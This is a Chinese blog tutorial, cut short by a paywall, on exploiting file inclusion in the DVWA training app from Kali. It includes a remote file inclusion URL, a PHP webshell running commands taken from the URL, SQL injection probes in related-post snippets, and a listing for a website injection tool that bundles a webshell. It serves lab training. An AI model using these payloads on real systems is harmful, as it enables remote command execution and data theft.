利用漏洞注入

已于 2023-06-04 23:34:41 修改
阅读量242 收藏 2
点赞数 1
文章标签: 安全 web安全 网络
于 2023-06-04 23:26:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71383067/article/details/131034495
版权
本文详细介绍了漏洞注入的概念及其在实际攻击中的应用,包括文件包含漏洞和SQL注入。通过实例演示了如何寻找文件包含漏洞,利用Burp Suite进行文件上传和包含,以及手动识别和利用SQL注入。同时,文章还总结了SQL注入的基本语句和MySQL相关知识,以及多种类型的SQL注入方法。最后,讨论了如何绕过一些防护措施进行注入攻击。
摘要由CSDN通过智能技术生成

文章目录

前言

在计算机安全领域,漏洞注入是一种常见的攻击技术,它利用软件漏洞或安全漏洞来攻击计算机系统。漏洞注入可以用于窃取数据、获取系统权限、破坏系统等各种恶意行为。为了保护计算机系统的安全,渗透测试和漏洞注入已经成为一个必不可少的领域。

本文将介绍漏洞注入的基本原理和方法,使用漏洞注入进行攻击的常见技术和工具,以及如何使用漏洞注入来防范攻击。此外,本文还提供了一系列实用的漏洞注入示例,以帮助读者更好地理解和应用这些技术。

无论您是一名网络安全专业人员还是一个普通用户,理解漏洞注入的原理和方法都非常重要。本文将深入探讨漏洞注入技术,以帮助您更好地理解和保护计算机系统的安全。

一、寻找文件包含漏洞

环境准备

1.开启OWASP靶机和Kali虚拟机

开启OWASP靶机

在这里插入图片描述
开启Kali虚拟机

在这里插入图片描述

2.kali中登陆dvwa(用户名和密码都是 admin),进入 File Inclusion 页面

在Kali中登录dvwa,进入File Inclusion页面

在这里插入图片描述

寻找文件包含漏洞案例

1.File Inclusion 页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试

在File Inclusion页面提示要测试包含的内容,将浏览器的URL中的page改为index.php进行尝试

在这里插入图片描述

2.为了尝试攻击,需要知道存在本地的文件名称,知道有个 index.php 在根目录下,所以尝试下目录遍历和文件包含。提交参数为…/…/index.php,可以证明存在文件包含漏洞了(“…/”表示返回上一级目录)

现在我们将浏览器的URL中的page改为…/…/index.php进行尝试

在这里插入图片描述

3.下面尝试一下远程文件包含漏洞。首先在Kali启动 apache 服务器:service apache2 start

在Kali虚拟机中启动Apache服务器,命令如下:

service apache2 start

在这里插入图片描述

4.现在利用这个文件包含漏洞,包含一下 Kali 的 apache 页面

在浏览器的URL中输入以下命令:

http://192.168.137.138/dvwa/vulnerabilities/fi/?page=http://192.168.137.167/index.html

得到结果

在这里插入图片描述

二、文件包含和文件上传

环境准备

1.开启OWASP靶机和Kali虚拟机

开启OWASP靶机

在这里插入图片描述
开启Kali虚拟机

在这里插入图片描述

2.在kali的/root/Document路径下,创建webshell.php文件

在Kali的/root/Document路径下,创建webshell.php文件,内容如下:

<?
    system($_GET['cmd']);
    echo 'Type a command:<form method="get"
    action="../../hackable/uploads/webshell.php"><input
    type="text" name="cmd"/></form>';
?>
最低0.47元/天 解锁文章
xianpaopao NO.1
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
SQL注入网站实例:注入步骤
老司机的后备箱
07-25 864
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
Web安全注入漏洞详解及预防
路多辛的所思所想
01-31 890
注入类攻击是 Web 安全领域中最常见的攻击方式,注入攻击发生在当不可信的数据作为命令或者查询语句的一部分被发送给解释器的时候。预防注入类攻击的最好方法是代码审核,可以将静态的(SAST)、动态的(DAST)和交互式(IAST)的安全测试工具集成到 CI/CD 流程中,以便在部署到生产环境之前检测出并解决掉注入安全问题。注意避免xml注入、代码注入、SQL注入、HTML注入注入安全问题的发生,一定要在数据拼接的地方进行安全检查,对拼接内容进行严格校验和必要的转义处理。常见的注入漏洞及预防措施。
OWASP之注入
weixin_45130489的博客
11-01 2641
注入漏洞产生的原因: 可控变量,带入数据库查询,变量未存在过滤或过滤不严谨。 怎么挖掘: 通过输入sql语句,尝试输入,然后发现页面的回显。 怎么利用: 确认有漏洞之后,通过sql语句获得数据库的版本,数据库的用户名,库名,表名,字段名,最后获得数据。 难点: 1.如何去判断一个网站是否存在注入漏洞,什么反应又代表不存在漏洞? 2.在网站配备了防火墙的情况下,怎么绕过?方法是什么? 注入流程: 1.判断注入 2.猜解列名数量(字段数) order by 用枚举法,试出错误与正常的临界值 ,假如判断出字段数量
OWASP靶场练习
yellow_fish_flag的博客
04-18 126
SQL注入 一、LOW难度SQL注入 1.判断注入类型 1.输入1 2.输入 1' and 1=2,报错 3.输入 1' and 1=2 #,无报错 得知为字符型注入 2.猜字段数 方法有两种: ① 1' order by N # ② 1' union select 1, 2, ... # 采用第一种方法 输入 1' order by 2 #无报错 输入 1' order by 3 #报错...
OWASP A3 Injection (注入
震山的博客
10-09 218
这是一篇关于注入漏洞的文章
利用漏洞注入之SQL注入
11-10
通过这些实例,我们可以了解SQL注入的常见手法,如利用文件包含漏洞和错误注入。防范SQL注入的关键在于参数化查询、预编译语句和输入验证。开发者应确保对所有用户输入进行严格检查,避免直接将用户数据拼接到SQL...
利用SQL注入漏洞拖库的方法
09-11
本文将深入探讨如何利用SQL注入漏洞进行拖库操作,即获取数据库中的全部或部分数据。 首先,理解SQL注入的基本原理至关重要。在上述示例中,程序没有对用户输入的$id$进行任何过滤或验证,直接将其拼接到SQL查询...
sqlmap注入漏洞测试
02-22
SQLMap 是一款自动化的 SQL 注入工具,它可以检测和利用 SQL 注入漏洞,以获取数据库中的敏感信息。 在本文中,我们将使用 SQLMap 工具来演示如何测试 SQL 注入漏洞。我们的目标是 stormgroup 数据库中的 member 表...
mysql5 注入漏洞
10-30
在本案例中,我们看到的是一段利用SQL注入漏洞的代码示例。 这段代码的目标是通过`CONCAT_WS`函数和一些特殊字符(0x2f代表'/')来拼接出数据库中的敏感信息。`CONCAT_WS`函数是`CONCAT`函数的变体,用于连接多个...
利用SQL注入漏洞登录后台的实现方法
12-15
当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下是对SQL注入的详细解释及其在登录后台中的实施方法。 1. **SQL注入的基本原理**: SQL注入的...
网站注入工具
12-17
Domain4.3(明小子)10.10.10更新版主要更新内容如下: 1.驱除部分死连接,恢复部分官方连接 2.改变默认显示页面为本人BLOG 3.修正程序在检测时出错的BUG 4.修正程序在部分系统中无法启动的BUG 5.加了一个功能模块,但还不成熟,隐藏了,高手的话可以用OD调出来!>!< 6.修复前段时间一些朋友反映的错误和程序宏 7.增加四款SKN皮肤! 10.10.11紧急更新: 1.修正新版程序在部分系统中启动后直接导致系统蓝屏的BUG 2.修正域名查询的几个错误 3.修正程序批量检测查询到域名的时候无反映的BUG! Domain4.2(明小子)10.01.16更新版主要更新内容如下: 1.删除所有无关数据 2.优化急速代码 3.改变启动线程 4.增加SQL数据批量导出功能 5.加入几个优化进程模块,非后门.后台运行. 6.锁定主程序栏目宽和高,不在恢复 7.删除“辅助工具”模块中全部代码 8.修正XP SP3 程序下兼容问题 9.重新改写域名查询旁站线程 程序于2018年01月16号调试完毕! 提别提示:第4个功能只能运行在完整版的windows XP 平台系统中,其他平台无法运行,如果出现恢复按钮并不能保存请自行调试与本程序无关.谢谢合作! 宝宝的话:有朋友们的鼓励才会有这个版本的发布,这当是我送给大家2010年里的第一个礼物吧。 Domain4.1(明小子)0901更新版主要更新内容如下: 1.增加新系统兼容模块,全面兼容2000-2008各系统 (部分精简版系统除外) 2.优化网站打开速度,删减部分无用内核信息,全面加快程序启动速度. 3.基于09.05.20号内核提升,改变搜查循环的一个死BUG! 4.删除在0520上增加的一个补针函数,并使用新的函数替换.保证不报错. 5.不在兼容xpsp3,因为没时间去修正这个错误。所以可能部分SP3系统运行不起来本程序 6.增加部分程序扩充空格代码,为下个版本更新做好铺垫 小提示:保留旧的IP反查连接系统,原因没有找到新的和稳定的IP反差服务器!如果有能提供的请与本人联系!谢谢合作 Domain4.1(明小子)0520更新版主要更新内容如下: 1.基于08.10.01号内核提升,修正一次关键错误。 2.替换原程序自带的那个小马,该为最新美化免杀版的小马! 3.添加一个服务器挂钩程序(非插件),使修改后的新内核兼容vista系统。 4.程序数据库默认名为:SetData.mdb 请大家使用3.5版本以上的MDB数据.其他低版本程序可能不兼容! 5.删除后台下载统计代码(以前没发现,本人也是从网站上面下的软件,排除作者自添加行为) 6.加了一个补针,针对sql注入功能中的一个小BUG。 7.删除了很多没有用的代码,最大限度的优化程序启动速度。 8.更新部分在xpsp3下出错的几个小BUG(小问题小解决,这个错误仅针对部分优化过度的XPSP3系统)。 提记:很多朋友说需要修改下程序IP域名查询功能,这里说明下.由于内核找不到关键句柄导致无法更新,下个版本在仔细看看! Domain4.0(明小子)1001更新版主要更新内容如下: 1.更新部分过度优化过的系统不兼容问题。 2.修改内存识别函数,使其降低软件在使用期间所占用的内存大小。 3.基于08.09.15号内核提升,修正因修改软件所出现的几个导致软件崩溃的几个BUG。 4.换了软件自带的那个垃圾皮肤。加入兼容美化皮肤!更美观! 5.兼容前版本数据库支持功能
Kali Linux渗透测试——WEB渗透(二)
Captain_RB的博客
01-21 9640
Kali Linux渗透测试——WEB渗透(二) 笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——WEB渗透(二)漏洞挖掘1.目录遍历/文件包含2.文件上传3.SQL注入4.XSS(Cross-Site Scripting)5.CSRF(Cross Site Request Forgery)6.WebShell7.HTTPS攻击8.P...
kali下的webshell工具-Weevely
@小张小张的博客
09-29 3676
kali下的webshell工具-Weevely weevely是适用于php网站webshell工具,使用weevely生成的木马免杀能力较强,而且使用加密连接,往往能轻松突破WAF拦截。 Weevely工具使用Python语言编写,集生成木马与连接于一身,相当于Linux中的中国菜刀,但只适用于php网站,支持图片与.htaccess两种绕过方式。生成的木马文件进行了base64加密处理。它实现了SSH 风格的终端界面,并有大量自动化的模块。测试人员可用它执行系统指令、远程管理和渗透后期的自动渗透;
记录一次对某网站的sql注入
weixin_67503304的博客
09-16 3624
讲解了一次基本sql注入的实战讲解,针对某省某网站的实战测试,本测试仅用于演示。
3-1SQL注入网站实例:注入步骤
VN520的博客
07-27 763
在第三部分,我们主要是详细的给大家演示,如何对一个网站进行SQL注入入侵的,这个入侵过程中,它是如何发现注入点的,发现和测试注入点之后,我们要如何来获得爆库、爆表、爆密码,甚至控制后台,一旦获得网站控制后台之后,更有甚者,要如何与数据库层、系统层进行交互提权,以便进一步控制数据库和操作系统,所有这些又是如何发生的我们将通过详细的注入实例,我们从中吸取教训,从安全角度来说,我们要如何来预防mysql注入的高级黑客,这就是我们第三部分所要解决的问题。
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 482
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
网络安全:Kali Linux 进行SQL注入与XSS漏洞利用
2401_84139924的博客
04-09 1020
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Kali自带的webshell客户端
Yale的博客
12-26 3356
0x01 第一个要介绍的是webacoo。 webacoo旨在通过HTTP在客户端和web服务器之间提供类似隐形终端连接。它是一个后渗透利用工具,能够维持对已被拿下的web服务器的权限访问。WeBaCoo可以绕过最新的AV,NIDS,IPS,网络防火墙和应用防火墙的检测,能够在被拿下的服务器中悄无声息的执行系统命令。 首先使用-h看看用法 简单的翻译如下: -g Generate bac...
SQL手工注入网站笔记
swaggy_tt的博客
12-03 689
SQL手工注入网站笔记 目标网站:http://testphp.vulnweb.com/listproducts.php?cat=1 1.判断注入点: http://testphp.vulnweb.com/listproducts.php?cat=1’ http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=1 永真条件,回显正常 http://testphp.vulnweb.com/listproducts.php?cat=1 and 1=2 永假
sql注入漏洞利用
最新发布
06-18
以下是SQL注入漏洞的基本利用方法: 1. **恶意输入处理**:攻击者通过在表单字段或URL中输入恶意SQL代码,例如使用"'"号来中断查询的正常逻辑,或者在条件语句中添加不期望的数据。 2. **查询截取和拼接**:应用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xianpaopao NO.1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值